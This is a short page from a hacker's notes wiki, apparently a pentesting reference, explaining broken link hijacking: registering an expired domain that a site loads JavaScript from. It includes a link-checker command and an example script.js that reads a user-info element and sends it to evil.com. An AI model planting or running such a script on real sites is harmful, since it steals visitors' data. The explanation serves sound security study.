search
The Hacker's Notes
githubEdit

Broken Links Hijacking

hashtag
Tools

# https://github.com/stevenvachon/broken-link-checker 
blc -rfoi --exclude linkedin.com --exclude youtube.com --filter-level 3 https://example.com/

hashtag
Broken Link Hijacking

Broken Link Hijacking is an attack method that attacker can execute arbitrary code by hijacking link e.g. JavaScript file if target website is loading file with broken link.

hashtag
Investigation

Assume that target website loads external JavaScript file in example.com no longer exists as below.

<script src="//example.com/script.js"></script>

If attacker bought this domain, he can host arbitrary JavaScript file named script.js in the example.com root directory.

hashtag
Exploitation Examples

Attacker can write arbitrary code for compromising users in script.js as example above. For example, if target website includes sensitive information of authenticated user in the page where the broken link is loaded, attackers can send these information to their owned server.

// script.js
var secret = document.getElementById('userinfo');
var request = new XMLHttpRequest();
request.open('GET', 'http://evil.com/?data=' + secret, false);
request.send();

hashtag
References

PreviousBroken Access ControlNextBusiness Logic Attack

Last updated